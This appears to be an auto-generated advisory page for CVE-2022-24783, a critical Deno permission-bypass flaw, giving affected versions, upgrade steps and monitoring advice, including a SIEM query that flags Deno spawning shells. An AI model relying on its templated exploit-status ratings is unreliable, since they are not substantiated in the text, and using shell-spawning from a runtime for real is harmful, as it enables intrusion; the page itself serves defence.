CVE-2022-24783 – This critical vulnerability in Deno runtime all... (How to Fix)

Q: What is the severity of CVE-2022-24783?

CVE-2022-24783 has a CVSS score of 10.0 (CRITICAL). This critical vulnerability in Deno runtime allows malicious code to bypass all permission checks and execute arbitrary shell commands with full system privileges. It affects all users running Deno versions 1.18.0 through 1.20.2. Deno Deploy users are not affected.

📋 TL;DR

This critical vulnerability in Deno runtime allows malicious code to bypass all permission checks and execute arbitrary shell commands with full system privileges. It affects all users running Deno versions 1.18.0 through 1.20.2. Deno Deploy users are not affected.

💻 Affected Systems

Products:

Deno

Versions: 1.18.0 through 1.20.2 (inclusive)

Operating Systems: All platforms where Deno runs (Linux, Windows, macOS)

Default Config Vulnerable: ⚠️ Yes

Notes: All Deno installations in affected version range are vulnerable regardless of configuration. Deno Deploy is NOT affected.

📦 What is this software?

Deno by Deno

View all CVEs affecting Deno →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system compromise - attacker gains full control over the host system, can execute arbitrary commands, access sensitive data, install malware, or pivot to other systems.

🟠

Likely Case

Remote code execution leading to data theft, system manipulation, or deployment of ransomware/malware on vulnerable Deno applications.

🟢

If Mitigated

Limited impact if Deno runs in isolated containers with minimal privileges and network restrictions, though RCE would still be possible within the container.

🌐 Internet-Facing: HIGH - Any internet-facing Deno application with user-controlled code execution is immediately vulnerable to complete takeover.

🏢 Internal Only: HIGH - Internal applications are equally vulnerable; exploitation could lead to lateral movement within the network.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Exploitation requires the attacker to control code executed by Deno, which is common in many Deno applications. The vulnerability bypasses all permission checks.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.20.3

Vendor Advisory: https://github.com/denoland/deno/security/advisories/GHSA-838h-jqp6-cf2f

Restart Required: Yes

Instructions:

1. Stop all Deno processes. 2. Update Deno using: deno upgrade --version 1.20.3. 3. Verify the update with: deno --version. 4. Restart all Deno applications.

🔧 Temporary Workarounds

No workaround available

all

The vendor states there is no workaround for this vulnerability

🧯 If You Can't Patch

Immediately isolate affected systems from network access
Implement strict network segmentation and monitor for suspicious Deno process activity

🔍 How to Verify

Check if Vulnerable:

Run: deno --version and check if version is between 1.18.0 and 1.20.2 inclusive

Check Version:

deno --version

Verify Fix Applied:

Run: deno --version and confirm version is 1.20.3 or higher

📡 Detection & Monitoring

Log Indicators:

Unexpected shell command execution from Deno processes
Permission check bypass logs
Deno process spawning unexpected child processes

Network Indicators:

Deno processes making unexpected outbound connections
Suspicious network activity from Deno runtime

SIEM Query:

process.name:deno AND (process.parent.name:deno OR process.cmdline:*sh* OR process.cmdline:*bash* OR process.cmdline:*cmd*)

📊 Metadata

CVE ID: CVE-2022-24783

CVSS v3 Score: 10.0 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CWE: CWE-269

Published: March 25, 2022

Last Updated: November 21, 2024

🔗 References

https://github.com/denoland/deno/security/advisories/GHSA-838h-jqp6-cf2f Third Party Advisory
https://github.com/denoland/deno/security/advisories/GHSA-838h-jqp6-cf2f Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2022-24783, you might also want to check these: